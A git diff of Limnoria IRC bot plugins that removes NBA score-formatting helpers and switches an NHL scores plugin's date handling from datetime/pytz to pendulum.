-        schedule_path = schedule_path.replace('{{teamId}}', team_id)
-        schedule_path = schedule_path.replace('{{seasonScheduleYear}}',
-                                              str(season_year))
-
-        return self._getJSON(self._ENDPOINT_BASE_URL + schedule_path)['league']
-
-    def _tricodeToTeamId(self, tricode):
-        """Given a valid team tricode, get the `teamId` used in NBA.com"""
-
-        teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams']
-        teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path)
-
-        for team in teams_json['league']['standard']:
-            if team['tricode'] == tricode:
-                return team['teamId']
-
-        raise ValueError('{} is not a valid tricode'.format(tricode))
-
-    def _teamIdToTricode(self, team_id):
-        """Given a valid teamId, get the team's tricode"""
-
-        teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams']
-        teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path)
-
-        for team in teams_json['league']['standard']:
-            if team['teamId'] == team_id:
-                return team['tricode']
-
-        raise ValueError('{} is not a valid teamId'.format(team_id))
-
-    def _getURL(self, url, force_revalidation=False):
-        """Use httplib2 to download the URL's content.
-
-        The `force_revalidation` parameter forces the data to be
-        validated before being returned from the cache.
-        In the worst case the data has not changed in the server,
-        and we get a '304 - Not Modified' response.
-        """
-        user_agent = 'Mozilla/5.0 \
-                      (X11; Ubuntu; Linux x86_64; rv:45.0) \
-                      Gecko/20100101 Firefox/45.0'
-        header = {'User-Agent': user_agent}
-
-        if force_revalidation:
-            header['Cache-Control'] = 'max-age=0'
-
-        response, content = self._http.request(url, 'GET', headers=header)
-
-        if response.fromcache:
-            self.log.debug('%s - 304/Cache Hit', url)
-
-        if response.status == 200:
-            return content
-
-        self.log.error('HTTP Error (%s): %s', url, error.code)
-        raise ConnectionError('Could not access URL')
-
-    @staticmethod
-    def _extractJSON(body):
-        return json.loads(body)
-
-    def _getJSON(self, url):
-        """Fetch `url` and return its contents decoded as json."""
-        return self._extractJSON(self._getURL(url))
-
-    @classmethod
-    def _parseGames(cls, json_data):
-        """Extract all relevant fields from NBA.com's scoreboard.json
-        and return a list of games.
-        """
-        games = []
-        for g in json_data['games']:
-            # Starting times are in UTC. By default, we will show
-            # Eastern times.
-            # (In the future we could add a user option to select
-            # timezones.)
-            try:
-                starting_time = cls._ISODateToEasternTime(g['startTimeUTC'])
-            except:
-                starting_time = 'TBD' if g['isStartTimeTBD'] else ''
-
-            game_info = {'game_id': g['gameId'],
-                         'home_team': g['hTeam']['triCode'],
-                         'away_team': g['vTeam']['triCode'],
-                         'home_score': g['hTeam']['score'],
-                         'away_score': g['vTeam']['score'],
-                         'starting_year': g['startDateEastern'][0:4],
-                         'starting_month': g['startDateEastern'][4:6],
-                         'starting_day': g['startDateEastern'][6:8],
-                         'starting_time': starting_time,
-                         'starting_time_TBD': g['isStartTimeTBD'],
-                         'clock': g['clock'],
-                         'period': g['period'],
-                         'buzzer_beater': g['isBuzzerBeater'],
-                         'ended': (g['statusNum'] == 3),
-                         'text_nugget': g['nugget']['text'].strip(),
-                         'tv_broadcasters': cls._extractGameBroadcasters(g)
-                        }
-
-            games.append(game_info)
-
-        return games
-
-    @staticmethod
-    def _extractGameBroadcasters(game_json):
-        """Extract the list of broadcasters from the API.
-        Return a dictionary of broadcasts:
-        (['vTeam', 'hTeam', 'national', 'canadian']) to
-        the short name of the broadcaster.
-        """
-        json_data = game_json['watch']['broadcast']['broadcasters']
-        game_broadcasters = dict()
-
-        for category in json_data:
-            broadcasters_list = json_data[category]
-            if broadcasters_list and 'shortName' in broadcasters_list[0]:
-                game_broadcasters[category] = broadcasters_list[0]['shortName']
-        return game_broadcasters
-
-############################
-# Formatting helpers
-############################
-    @classmethod
-    def _resultAsString(cls, games):
-        if not games:
-            return "No games found"
-
-        # sort games list and put F(inal) games at end
-        sorted_games = sorted(games, key=lambda k: k['ended'])
-        return ' | '.join([cls._gameToString(g) for g in sorted_games])
-
-    @classmethod
-    def _gameToString(cls, game):
-        """ Given a game, format the information into a string
-        according to the context.
-
-        For example:
-        * "MEM @ CLE 07:00 PM ET" (a game that has not started yet),
-        * "HOU 132 GSW 127 F OT2" (a game that ended and went to 2
-        overtimes),
-        * "POR 36 LAC 42 8:01 Q2" (a game in progress).
-        """
-        away_team = game['away_team']
-        home_team = game['home_team']
-
-        if game['period']['current'] == 0: # The game hasn't started yet
-            starting_time = game['starting_time'] \
-                            if not game['starting_time_TBD'] \
-                            else "TBD"
-            return "{} @ {} {}".format(away_team, home_team, starting_time)
-
-        # The game started => It has points:
-        away_score = game['away_score']
-        home_score = game['home_score']
-
-        away_string = "{} {}".format(away_team, away_score)
-        home_string = "{} {}".format(home_team, home_score)
-
-        # Bold for the winning team:
-        if int(away_score) > int(home_score):
-            away_string = ircutils.bold(away_string)
-        elif int(home_score) > int(away_score):
-            home_string = ircutils.bold(home_string)
-
-        game_string = "{} {} {}".format(away_string, home_string,
-                                        cls._clockBoardToString(game['clock'],
-                                                                game['period'],
-                                                                game['ended']))
-        # Highlighting 'buzzer-beaters':
-        if game['buzzer_beater'] and not game['ended']:
-            game_string = ircutils.mircColor(game_string, fg='yellow',
-                                             bg='black')
-
-        return game_string
-
-    @classmethod
-    def _clockBoardToString(cls, clock, period, game_ended):
-        """Get a string with current period and, if the game is still
-        in progress, the remaining time in it.
-        """
-        period_number = period['current']
-        # Game hasn't started => There is no clock yet.
-        if period_number == 0:
-            return ''
-
-        # Halftime
-        if period['isHalftime']:
-            return ircutils.mircColor('Halftime', 'orange')
-
-        period_string = cls._periodToString(period_number)
-
-        # Game finished:
-        if game_ended:
-            if period_number == 4:
-                return ircutils.mircColor('F', 'red')
-
-            return ircutils.mircColor("F {}".format(period_string), 'red')
-
-        # Game in progress:
-        if period['isEndOfPeriod']:
-            return ircutils.mircColor("E{}".format(period_string), 'blue')
-
-        # Period in progress, show clock:
-        return "{} {}".format(clock, ircutils.mircColor(period_string,
-                                                        'green'))
-
-    @staticmethod
-    def _periodToString(period):
-        """Get a string describing the current period in the game.
-
-        Period is an integer counting periods from 1 (so 5 would be
-        OT1).
-        The output format is as follows: {Q1...Q4} (regulation);
-        {OT, OT2, OT3...} (overtimes).
-        """
-        if period <= 4:
-            return "Q{}".format(period)
-
-        ot_number = period - 4
-        if ot_number == 1:
-            return "OT"
-        return "OT{}".format(ot_number)
-
-    @staticmethod
-    def _broadcastersToString(broadcasters):
-        """Given a broadcasters dictionary (category->name), where
-        category is in ['vTeam', 'hTeam', 'national', 'canadian'],
-        return a printable string representation of that list.
-        """
-        items = []
-        for category in ['vTeam', 'hTeam', 'national', 'canadian']:
-            if category in broadcasters:
-                items.append(broadcasters[category])
-        return ', '.join(items)
-
-    def _upcomingGameToString(self, game):
-        """Given a team's upcoming game, return a string with
-        the opponent's tricode and the date of the game.
-        """
-
-        date = self._ISODateToEasternDatetime(game['startTimeUTC'])
-
-        home_tricode = self._teamIdToTricode(game['hTeam']['teamId'])
-        away_tricode = self._teamIdToTricode(game['vTeam']['teamId'])
-
-        if game['isHomeTeam']:
-            home_tricode = ircutils.bold(home_tricode)
-        else:
-            away_tricode = ircutils.bold(away_tricode)
-
-        return '{} | {} @ {}'.format(date, away_tricode, home_tricode)
-
-    def _pastGameToString(self, game):
-        """Given a team's upcoming game, return a string with
-        the opponent's tricode and the result.
-        """
-        date = self._ISODateToEasternDate(game['startTimeUTC'])
-
-        home_tricode = self._teamIdToTricode(game['hTeam']['teamId'])
-        away_tricode = self._teamIdToTricode(game['vTeam']['teamId'])
-
-        home_score = int(game['hTeam']['score'])
-        away_score = int(game['vTeam']['score'])
-
-        if game['isHomeTeam']:
-            was_victory = (home_score > away_score)
-        else:
-            was_victory = (away_score > home_score)
-
-        if home_score > away_score:
-            home_tricode = ircutils.bold(home_tricode)
-            home_score = ircutils.bold(home_score)
-        else:
-            away_tricode = ircutils.bold(away_tricode)
-            away_score = ircutils.bold(away_score)
-
-        result = ircutils.mircColor('W', 'green') if was_victory \
-                 else ircutils.mircColor('L', 'red')
-
-        points = '{} {} {} {}'.format(away_tricode, away_score,
-                                      home_tricode, home_score)
-
-        if game['seasonStageId'] == 1:
-            points += ' (Preseason)'
-
-        return '{} {} | {}'.format(date, result, points)
-
-############################
-# Date-manipulation helpers
-############################
-    @classmethod
-    def _getTodayDate(cls):
-        """Get the current date formatted as "YYYYMMDD".
-        Because the API separates games by day of start, we will
-        consider and return the date in the Pacific timezone.
-        The objective is to avoid reading future games anticipatedly
-        when the day rolls over at midnight, which would cause us to
-        ignore games in progress that may have started on the previous
-        day.
-        Taking the west coast time guarantees that the day will advance
-        only when the whole continental US is already on that day.
-        """
-        today = cls._pacificTimeNow().date()
-        today_iso = today.isoformat()
-        return today_iso.replace('-', '')
-
-    @staticmethod
-    def _easternTimeNow():
-        return pendulum.now('US/Eastern')
-
-    @staticmethod
-    def _pacificTimeNow():
-        return pendulum.now('US/Pacific')
-
-    @staticmethod
-    def _ISODateToEasternDate(iso):
-        """Convert the ISO date in UTC time that the API outputs into an
-        Eastern-time date.
-        (The default human-readable format for the listing of games).
-        """
-        date = pendulum.parse(iso)
-        date_eastern = date.in_tz('US/Eastern')
-        eastern_date = date_eastern.strftime('%a %m/%d')
-        return "{}".format(eastern_date)
-
-    @staticmethod
-    def _ISODateToEasternTime(iso):
-        """Convert the ISO date in UTC time that the API outputs into an
-        Eastern time formatted with am/pm.
-        (The default human-readable format for the listing of games).
-        """
-        date = pendulum.parse(iso)
-        date_eastern = date.in_tz('US/Eastern')
-        eastern_time = date_eastern.strftime('%-I:%M %p')
-        return "{} ET".format(eastern_time)
-
-    @staticmethod
-    def _ISODateToEasternDatetime(iso):
-        """Convert the ISO date in UTC time that the API outputs into a
-        string with a date and Eastern time formatted with am/pm.
-        """
-        date = pendulum.parse(iso)
-        date_eastern = date.in_tz('US/Eastern')
-        eastern_datetime = date_eastern.strftime('%a %m/%d, %I:%M %p')
-        return "{} ET".format(eastern_datetime)
-
-    @staticmethod
-    def _stripDateSeparators(date_string):
-        return date_string.replace('-', '')
-
-    @classmethod
-    def _EnglishDateToDate(cls, date):
-        """Convert a human-readable like 'yesterday' to a datetime
-        object and return a 'YYYYMMDD' string.
-        """
-        if date == 'yesterday':
-            day_delta = -1
-        elif date == 'today' or date == 'tonight':
-            day_delta = 0
-        elif date == 'tomorrow':
-            day_delta = 1
-        # Calculate the day difference and return a string
-        date_string = cls._pacificTimeNow().add(days=day_delta).strftime('%Y%m%d')
-        return date_string
-
-    @classmethod
-    def _isValidTricode(cls, team):
-        return team in cls._TEAM_TRICODES
-
-############################
-# Input-parsing helpers
-############################
-    @classmethod
-    def _isPotentialDate(cls, string):
-        """Given a user-provided string, check whether it could be a
-        date.
-        """
-        return (string.lower() in cls._FUZZY_DAYS or
-                string.replace('-', '').isdigit())
-
-    @classmethod
-    def _parseTeamInput(cls, team):
-        """Given a user-provided string, try to extract an upper-case
-        team tricode from it. If not valid, throws a ValueError
-        exception.
-        """
-        t = team.upper()
-        if not cls._isValidTricode(t):
-            raise ValueError('{} is not a valid team'.format(team))
-        return t
-
-    @classmethod
-    def _parseDateInput(cls, date):
-        """Verify that the given string is a valid date formatted as
-        YYYY-MM-DD. Also, the API seems to go back until 2014-10-04,
-        so we will check that the input is not a date earlier than that.
-        In case of failure, throws a ValueError exception.
-        """
-        date = date.lower()
-
-        if date in cls._FUZZY_DAYS:
-            date = cls._EnglishDateToDate(date)
-
-        elif date.replace('-', '').isdigit():
-            try:
-                parsed_date = pendulum.from_format(date, 'YYYY-MM-DD')
-            except:
-                raise ValueError('Incorrect date format, should be YYYY-MM-DD')
-
-            # The current API goes back until 2014-10-04. Is it in range?
-            if parsed_date < pendulum.datetime(2014, 10, 4):
-                raise ValueError('I can only go back until 2014-10-04')
-        else:
-            raise ValueError('Date is not valid')
-
-        return cls._stripDateSeparators(date)
-
-
-    def _getRecapInfo(self, game):
-        """Given a finished game, fetch its recap summary and a link
-        to its video recap. It returns a string with the format
-        '{summary} (link to video)'.
-
-        The link is shortened by calling _shortenURL(str) -> str.
-        """
-
-        recap_base_url = 'https://www.nba.com/video/'\
-                         '{year}/{month}/{day}/'\
-                         '{game_id}-{away_team}-{home_team}-recap.xml'
-
-        url = recap_base_url.format(year=game['starting_year'],
-                                    month=game['starting_month'],
-                                    day=game['starting_day'],
-                                    game_id=game['game_id'],
-                                    away_team=game['away_team'].lower(),
-                                    home_team=game['home_team'].lower())
-
-        xml = self._getURL(url)
-        tree = ElementTree.fromstring(xml)
-
-        res = []
-
-        summary = tree.find('description')
-        if summary is not None:
-            res.append(summary.text)
-
-        video_recap = tree.find("*file[@bitrate='1920x1080_5904']")
-        if video_recap is not None:
-            url = self._shortenURL(video_recap.text)
-            res.append('({})'.format(url))
-
-        return ' '.join(res)
-
-    @staticmethod
-    def _shortenURL(url):
-        """ Run a link through an URL shortener and return the new url."""
-
-        # Complete with the code that uses your desired
-        # shortener service.
-        return url
-
-
-Class = NBA
-
-# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
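
The post-migration file above expresses the same validation with pendulum; a matching sketch under the same assumptions (hypothetical function name, `pendulum` installed):

    import pendulum

    def parse_api_date(text):
        try:
            # from_format raises ValueError on malformed input, like strptime.
            parsed = pendulum.from_format(text, 'YYYY-MM-DD')
        except ValueError:
            raise ValueError('Incorrect date format, should be YYYY-MM-DD')
        # pendulum datetimes compare directly with pendulum.datetime(...),
        # so no .date() extraction is needed.
        if parsed < pendulum.datetime(2014, 10, 4):
            raise ValueError('I can only go back until 2014-10-04')
        return text.replace('-', '')
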
pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' -@@ -215,7 +212,7 @@ class NHL(callbacks.Plugin): - return - games_string = self._resultTVAsString(games) - try: -- tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') -+ tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' -@@ -595,10 +592,10 @@ class NHL(callbacks.Plugin): - return today_iso #.replace('-', '') - - def _easternTimeNow(self): -- return datetime.datetime.now(pytz.timezone('US/Eastern')) -+ return pendulum.now('US/Eastern') - - def _pacificTimeNow(self): -- return datetime.datetime.now(pytz.timezone('US/Pacific')) -+ return pendulum.now('US/Pacific') - - def _convertISODateToTime(self, iso, target='US/Eastern'): - """Convert the ISO date in UTC time that the API outputs into a -@@ -684,17 +681,16 @@ class NHL(callbacks.Plugin): - date_string = pendulum.now('US/Pacific').next(pendulum.SATURDAY).format('YYYY-MM-DD') - return date_string - # Calculate the day difference and return a string -- date_string = (self._pacificTimeNow() + -- datetime.timedelta(days=day_delta)).strftime('%Y-%m-%d') -+ date_string = self._pacificTimeNow().add(days=day_delta).strftime('%Y-%m-%d') - return date_string - - def _checkDateInput(self, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. Also, the API seems to go back until 2014-10-04, so we - will check that the input is not a date earlier than that.""" -- -+ - error_string = 'Incorrect date format, should be YYYY-MM-DD' -- -+ - if date is None: - return None - -@@ -702,30 +698,20 @@ class NHL(callbacks.Plugin): - date = self._EnglishDateToDate(date) - elif date[:3].lower() in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date.lower()) --# elif date[:3].upper() in self._TEAMS_BY_TRI: --# date = date[:3].upper() --# return date -- -- #try: -- # date = dateutil.parser.parse(date) -- #except: -- # raise ValueError('Incorrect date format, should be YYYY-MM-DD') -- -- #print(date) -- -+ - if date.isdigit(): - try: -- date = datetime.datetime.strptime(date, '%Y%m%d').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'YYYYMMDD').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('-','').isdigit(): - try: -- parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') -+ parsed_date = pendulum.from_format(date, 'YYYY-MM-DD') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('/','').isdigit(): - if len(date.split('/')) == 2: -- year = '/' + str(datetime.datetime.now().year) -+ year = '/' + str(pendulum.datetime.now().year) - date += year - elif len(date.split('/')) == 3: - if len(date.split('/')[2]) == 2: -@@ -733,7 +719,7 @@ class NHL(callbacks.Plugin): - else: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - try: -- date = datetime.datetime.strptime(date, '%m/%d/%Y').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'MM/DD/YYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif '-' not in date and date.isdigit() == False and len(date) > 3: -@@ -741,12 +727,12 @@ class NHL(callbacks.Plugin): - return "Incorrect date format, should be YYYY-MM-DD" - try: - date = date.title() -- year = str(datetime.datetime.now().year) -+ year = 
str(pendulum.datetime.now().year) - date += year - try: -- date = datetime.datetime.strptime(date, '%d%b%Y').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'DDMMMYYYY').strftime('%Y-%m-%d') - except: -- date = datetime.datetime.strptime(date, '%b%d%Y').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'MMMDDYYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - #return "Incorrect date format, should be YYYY-MM-DD" diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py deleted file mode 100644 index a69d155..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py +++ /dev/null @@ -1,760 +0,0 @@ -### -# Copyright (c) 2016, Santiago Gil -# Copyright (c) 2020, oddluck -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -### - -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NHL') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x: x - -import datetime -import dateutil.parser -import json -import pytz -import urllib.request -import pendulum -import requests - -class NHL(callbacks.Plugin): - """Get scores from NHL.com.""" - def __init__(self, irc): - self.__parent = super(NHL, self) - self.__parent.__init__(irc) - - self._SCOREBOARD_ENDPOINT = ("https://statsapi.web.nhl.com/api/v1/schedule?startDate={}&endDate={}" + - "&expand=schedule.teams,schedule.linescore,schedule.broadcasts.all,schedule.ticket,schedule.game.content.media.epg" + - "&leaderCategories=&site=en_nhl&teamId=") - # https://statsapi.web.nhl.com/api/v1/schedule?startDate=2016-12-15&endDate=2016-12-15 - # &expand=schedule.teams,schedule.linescore,schedule.broadcasts,schedule.ticket,schedule.game.content.media.epg - # &leaderCategories=&site=en_nhl&teamId= - - self._FUZZY_DAYS = ['yesterday', 'tonight', 'today', 'tomorrow', - 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'] - - # These two variables store the latest data acquired from the server - # and its modification time. It's a one-element cache. - # They are used to employ HTTP's 'If-Modified-Since' header and - # avoid unnecessary downloads for today's information (which will be - # requested all the time to update the scores). - self._today_scores_cached_url = None - self._today_scores_last_modified_time = None - self._today_scores_last_modified_data = None - - self._TEAMS_BY_TRI = self._getTeams() - - #pendulum.set_formatter('alternative') - - def nhl(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get games for a given date (YYYY-MM-DD). If none is specified, return games - scheduled for today. 
Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. - tz = None - if optional_team is None: - team = "all" - if optional_date: - if '--tz' in optional_date: - tz = optional_date.split()[2] - optional_date = optional_date.split()[0] - try: - date = self._checkDateInput(optional_date) - #print("1") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - if optional_team == '--tz': - tz = optional_date - team = 'all' - date = None - else: - date = self._checkDateInput(optional_team) - #print("2") - if date: # and len(date) != 3: - team = "all" -# elif date and len(date) == 3: -# team = date -# date = None - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - #print("3") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - if not tz: - tz = 'US/Eastern' - games = self._getTodayGames(team, tz) - games_string = self._resultAsString(games) - if not games_string: - irc.reply("No games found for {}".format(team)) - return - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[1]['clock'], games[1]['ended']) - if len(games) == 2: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - #print(games) - irc.reply(games_string_date + games_string) - else: - games = self._getGamesForDate(team, date) - games_string = self._resultAsString(games) - #print(games_string) - if games_string == '': - irc.reply("No games found for {}".format(team)) - return - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - nhl = wrap(nhl, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTeams(self): - - url = 'https://statsapi.web.nhl.com/api/v1/teams' - try: - data = requests.get(url).json() - data = data['teams'] - except: - return None - - teams = [] - for team in data: - teams.append(team['abbreviation']) - return teams - - def nhltv(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get television broadcasts for a given date (YYYY-MM-DD). If none is specified, return broadcasts - scheduled for today. Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. 
- if optional_team is None: - team = "all" - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - date = self._checkDateInput(optional_team) - if date: - team = "all" - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - games = self._getTodayTV(team) - games_string = self._resultTVAsString(games) - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[0]['clock'], games[0]['ended']) - if len(games) == 1: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - irc.reply(games_string_date + games_string) - else: - games = self._getTVForDate(team, date) - if isinstance(games, str): - irc.reply(games) - return - games_string = self._resultTVAsString(games) - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - #if date is None: - # irc.reply(self._getTodayTV(team)) - #else: - # irc.reply(self._getTVForDate(team, date)) - - nhltv = wrap(nhltv, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTodayGames(self, team, tz='US/Eastern'): - games = self._getGames(team, self._getTodayDate(), tz) - return games - - def _getGamesForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - - def _getTodayTV(self, team): - games = self._getGames(team, self._getTodayDate()) - return games - - def _getTVForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - -############################ -# Content-getting helpers -############################ - def _getGames(self, team, date, tz='US/Eastern'): - """Given a date, populate the url with it and try to download its - content. If successful, parse the JSON data and extract the relevant - fields for each game. Returns a list of games.""" - url = self._getEndpointURL(date) - - # (If asking for today's results, enable the 'If-Mod.-Since' flag) - use_cache = (date == self._getTodayDate()) - #use_cache = False - response = self._getURL(url, use_cache) - if isinstance(response, str): - return "ERROR: Something went wrong, check input" - - json = self._extractJSON(response) - games = self._parseGames(json, team, tz) - return games - - def _getEndpointURL(self, date): - return self._SCOREBOARD_ENDPOINT.format(date, date) - - def _getURL(self, url, use_cache=False): - """Use urllib to download the URL's content. The use_cache flag enables - the use of the one-element cache, which will be reserved for today's - games URL. (In the future we could implement a real cache with TTLs).""" - user_agent = 'Mozilla/5.0 \ - (X11; Ubuntu; Linux x86_64; rv:45.0) \ - Gecko/20100101 Firefox/45.0' - header = {'User-Agent': user_agent} - response = None - - # ('If-Modified-Since' to avoid unnecessary downloads.) 
- if use_cache and self._haveCachedData(url): - header['If-Modified-Since'] = self._today_scores_last_modified_time - - request = urllib.request.Request(url, headers=header) - #print(url) - - try: - response = urllib.request.urlopen(request) - except urllib.error.HTTPError as error: - if use_cache and error.code == 304: # Cache hit - self.log.info("{} - 304" - "(Last-Modified: " - "{})".format(url, self._cachedDataLastModified())) - return self._cachedData() - else: - self.log.error("HTTP Error ({}): {}".format(url, error.code)) - pass - - self.log.info("{} - 200".format(url)) - - if not response: - return "ERROR: Something went wrong, check input" - - if not use_cache: - return response.read() - - # Updating the cached data: - self._updateCache(url, response) - return self._cachedData() - - def _extractJSON(self, body): - return json.loads(body.decode('utf-8')) - - def _parseGames(self, json, team, tz='US/Eastern'): - """Extract all relevant fields from NHL.com's json - and return a list of games.""" - games = [] - if json['totalGames'] == 0: - return games - games.append(json['dates'][0]['date']) - for g in json['dates'][0]['games']: - #print(g) - # Starting times are in UTC. By default, we will show Eastern times. - # (In the future we could add a user option to select timezones.) - tbd_check = self._ISODateToEasternTime(g['gameDate']) - #print(tbd_check) - if '3:00 AM' in tbd_check: - starting_time = 'TBD' - #starting_time_TBD = True - else: - if 'US/Eastern' not in tz: - starting_time = self._convertISODateToTime(g['gameDate'], tz) - else: - starting_time = self._ISODateToEasternTime(g['gameDate']) - broadcasts = [] - try: - for item in g['broadcasts']: - broadcasts.append(item['name']) - except: - pass - #print(broadcasts) - game_info = {'home_team': g['teams']['home']['team']['abbreviation'], - 'away_team': g['teams']['away']['team']['abbreviation'], - 'home_score': g['teams']['home']['score'], - 'away_score': g['teams']['away']['score'], - 'broadcasts': '{}'.format(', '.join(item for item in broadcasts)), - 'starting_time': starting_time, - 'starting_time_TBD': g['status']['startTimeTBD'], - 'pregame': (True if 'Pre-Game' in g['status']['detailedState'] else False), - 'period': g['linescore']['currentPeriod'], - 'clock': g['linescore'].get('currentPeriodTimeRemaining'), - 'powerplay_h': g['linescore']['teams']['home']['powerPlay'], - 'powerplay_a': g['linescore']['teams']['away']['powerPlay'], - 'goaliePulled_h': g['linescore']['teams']['home']['goaliePulled'], - 'goaliePulled_a': g['linescore']['teams']['away']['goaliePulled'], - 'ended': (g['status']['statusCode'] == '7' or g['status']['statusCode'] == '9'), - 'ppd': (g['status']['statusCode'] == '9'), - 'type': g['gameType'] - } - #print(game_info) - if team == "all": - games.append(game_info) - else: - if team in game_info['home_team'] or team in game_info['away_team']: - games.append(game_info) - else: - pass - return games - -############################ -# Today's games cache -############################ - def _cachedData(self): - return self._today_scores_last_modified_data - - def _haveCachedData(self, url): - return (self._today_scores_cached_url == url) and \ - (self._today_scores_last_modified_time is not None) - - def _cachedDataLastModified(self): - return self._today_scores_last_modified_time - - def _updateCache(self, url, response): - self._today_scores_cached_url = url - self._today_scores_last_modified_time = response.headers['last-modified'] - self._today_scores_last_modified_data = response.read() - 
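The cache helpers above implement a one-element conditional-GET cache: the plugin remembers the Last-Modified stamp of the most recent response for today's scoreboard URL, replays it as an If-Modified-Since header, and serves the cached body whenever the server answers 304. A minimal standalone sketch of the same pattern, assuming a server that sends Last-Modified (the fetch/_cached_* names are illustrative, not taken from the plugin):

import urllib.error
import urllib.request

# One-element cache: the URL, its Last-Modified stamp, and its body.
_cached_url = None
_cached_last_modified = None
_cached_body = None

def fetch(url):
    global _cached_url, _cached_last_modified, _cached_body
    headers = {}
    # Replay the stored stamp so the server can answer 304 Not Modified.
    if url == _cached_url and _cached_last_modified is not None:
        headers['If-Modified-Since'] = _cached_last_modified
    request = urllib.request.Request(url, headers=headers)
    try:
        response = urllib.request.urlopen(request)
    except urllib.error.HTTPError as error:
        if error.code == 304:  # Cache hit: body unchanged since last fetch.
            return _cached_body
        raise
    # First fetch or cache miss: refresh all three slots.
    _cached_url = url
    _cached_last_modified = response.headers.get('Last-Modified')
    _cached_body = response.read()
    return _cached_body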
